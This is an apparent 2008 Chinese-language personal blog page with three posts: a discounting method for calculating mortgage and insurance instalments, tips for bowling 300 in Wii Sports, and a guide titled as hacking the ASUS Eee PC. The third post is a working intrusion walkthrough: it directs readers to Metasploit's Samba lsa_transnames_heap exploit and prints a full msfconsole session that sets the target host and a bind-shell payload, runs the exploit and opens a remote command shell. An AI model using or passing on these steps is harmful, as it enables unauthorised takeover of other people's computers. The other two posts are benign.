2008年2月18日 星期一

房貸/保險分期付款的簡單計算方法

很多人搞不清楚房貸或是保險的分期付款計算, 這裡介紹一個簡單的計算方式

(A) 首先介紹一個概念, "貼現"

假設銀行利率是3%, 100萬元的存款在明年會增加為103萬元, 後年106萬9百元, 以次類推
反過來看, 明年的103萬元, 就等價於今年的100萬元, 也就是說明年的1萬元 只等於今年的1萬*100/103 ~= 9709 元
以此類推, 後年的1萬元, 只等於今年的一萬*100/106.09 ~= 9426元

公式: 現值*((1+R)的N次方)=未來值, R是貼現率(通常可用銀行利率估算), N是期數
也就是 現值=未來值/((1+R)的N次方)

(B) 根據貼現的概念, 任何這種分期付款的計算都變得非常容易
把所有分期付款的錢, 貼現后的總和, 就是現在的總價

比方說20年的500萬房貸, 每個月需要平均分攤多少?

根據上面的貼現概念, 500萬 = (第1個月還款的現值) + (第2個月還款的現值) + ... + (第240個月還款的現值)

第N個月還款的現值 = 每月平均分攤值 /(( 1 + R )的N次方)

上面的計算可以用數學裡的等比級數公式, 或是利用 excel等試算軟體加以試算

等比級數的計算結果大約是200, 也就是說每期攤還 500萬元/200 = 2萬5千元

2008年2月14日 星期四

輕鬆打 WII / SPORT 保齡球 300 分


1. 先練精確
你必須尋找一種穩定的球路, 使用這種球路, 你可以100% 的命中目標點
以下幾個建議方式:
方法A. 對保齡球高手, 可使用實體保齡球中最擅長的直球球路
方法B. 對一般人, 可使用雙手握法(類似揮劍)的方式增加穩定性
方法C. 對於自認有運動障礙者, 可使用機械方式(比如說, 把wii握把綁在腳踏車輪上), 以減少左右搖晃的機會

2. 在練準確
掌握100%的擊球穩定性後, 再開始尋找全倒的擊球點, 原則上是在1號瓶的左右兩邊緣
全倒的擊球點不只一個, 這裡必須配合球路, 耐心尋找最佳擊球點. 最好是在這個點的左右差一點也可以造成全倒

就這麼簡單, 我用雙手握法大需練個數小時就常拿300分了

2008年2月13日 星期三

入侵/破解 eee pc 的方法

由於 ASUS 的 eee pc 使用舊版的 samba, 有 buffer overflow 的 bug

我們可以使用 Metasploit 這一類的 exploit 工具輕易地入侵 eee pc,

以下介紹 Linux 上的作法

1. 準備一個支援 ruby 的 Linux 電腦

2. 從 http://framework.metasploit.com 下載 Metasploit Framework 並安裝

3. 執行附件中的msf指令, 自 msf 的 console 將 exploit code 注入 eee pc 並建立控制通道

4. 經由控制通道, 可以執行 uname 等指令控制 eee pc

uname -a
Linux eeepc-agneshuan 2.6.21.4-eeepc #2 Mon Sep 24 14:09:46 EDT 2007 i686 GNU/Linux


(附件, msfconsole 指令)

[root@AX-HOST framework-3.1]# ./msfconsole

888 888 d8b888
888 888 Y8P888
888 888 888
88888b.d88b. .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888
888 "888 "88bd8P Y8b888 "88b88K 888 "88b888d88""88b888888
888 888 88888888888888 .d888888"Y8888b.888 888888888 888888888
888 888 888Y8b. Y88b. 888 888 X88888 d88P888Y88..88P888Y88b.
888 888 888 "Y8888 "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888
888
888
888


=[ msf v3.1-release
+ -- --=[ 262 exploits - 117 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 46 aux

msf > use linux/samba/lsa_transnames_heap
msf exploit(lsa_transnames_heap) > set RHOST 192.192.6.112
RHOST => 192.192.6.112
msf exploit(lsa_transnames_heap) > set PAYLOAD linux/x86/shell_bind_tcp
PAYLOAD => linux/x86/shell_bind_tcp
msf exploit(lsa_transnames_heap) > set TARGET 1
TARGET => 1
msf exploit(lsa_transnames_heap) > exploit
[*] Started bind handler
[*] Creating nop sled....
[*] Trying to exploit Samba with address 0x08352000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.192.6.112[\lsarpc] ...
...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.192.6.112[\lsarpc] ...
[*] Calling the vulnerable function...
[+] Server did not respond, this is expected
[*] Command shell session 1 opened (192.192.6.66:33929 -> 192.192.6.112:4444)
msf exploit(lsa_transnames_heap) > sessions -i 1
[*] Starting interaction with 1...